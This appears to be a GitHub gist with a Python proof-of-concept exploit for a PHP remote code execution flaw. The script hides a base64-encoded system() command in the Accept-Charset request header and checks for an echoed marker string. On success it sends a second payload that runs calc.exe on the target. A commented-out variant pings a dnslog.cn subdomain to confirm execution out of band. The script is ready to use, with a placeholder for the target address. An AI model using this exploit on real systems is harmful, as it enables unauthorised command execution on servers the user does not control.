Created
September 23, 2019 14:48
-
-
Save tennc/a44faf0434abebd90dd256e642b92a72 to your computer and use it in GitHub Desktop.
先检测,存在则触发命令
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# -*- coding: utf-8 -*- | |
# author: tennc | |
# date: 2019年9月23日 | |
import sys | |
import base64 | |
import requests | |
# url = str(sys.argv[1]) | |
# poc = str(sys.argv[2]) | |
url = r"http://192.168.1.7/l.php" # 这里填写目标地址 | |
# poc = r"system('ping fy3u12.dnslog.cn');" # 这里是dnslog.cn的地址,需要打开自己获取一个二级域名,然后修改这里的,之后就可以进行测试了,如果存在问题,dnslog.cn这里就能看到相应的信息 | |
# poc = "c3lzdGVtKCdjYWxjLmV4ZScpOw==" ==> system('calc.exe'); | |
poc = r"system('echo ac59075b964b0715');" # 这个是直接输出到网页,然后脚本检查关键词是否存在,存在即有漏洞,否则,不存在 | |
def check(): | |
headers = { | |
'User-Agent': r'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.17 Safari/537.36', | |
'Accept': r'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3', | |
'Accept-Language': r'zh-CN,zh;q=0.9,en;q=0.8', | |
'Accept-Encoding': r'gzip,deflate', | |
'Accept-Charset': str((base64.b64encode(poc.encode('utf-8'))), "utf-8")} | |
temp = requests.get(url, headers=headers) | |
print("开始测试") | |
if "ac59075b964b0715" in temp.text: | |
print("报告老大存在漏洞") | |
poc1 = r"system('calc.exe');" # 命令 | |
headers = { | |
'User-Agent': r'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.17 Safari/537.36', | |
'Accept': r'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3', | |
'Accept-Language': r'zh-CN,zh;q=0.9,en;q=0.8', | |
'Accept-Encoding': r'gzip,deflate', | |
'Accept-Charset': str((base64.b64encode(poc1.encode('utf-8'))), "utf-8")} | |
temp = requests.get(url, headers=headers) | |
print("报告首长,已经发射导弹。") | |
# print(poc) | |
# print(str((base64.b64encode(poc.encode('utf-8'))), "utf-8")) | |
# print(temp.text) | |
else: | |
print("error!!") | |
if __name__ == '__main__': | |
check() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment